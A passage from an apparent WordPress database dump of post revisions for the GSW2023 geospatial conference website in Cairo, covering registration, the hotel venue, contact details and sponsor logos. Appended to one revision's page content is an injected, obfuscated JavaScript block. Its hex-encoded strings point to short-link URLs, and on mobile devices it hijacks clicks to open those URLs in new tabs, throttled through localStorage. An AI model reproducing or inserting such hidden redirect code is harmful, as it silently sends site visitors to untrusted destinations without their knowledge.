10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:37:56','2023-05-17 04:37:56','',3066,'https://gsw2023.com/?p=4514',0,'revision','',0),
(4515,1,'2023-05-17 04:48:35','2023-05-17 04:48:35','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" 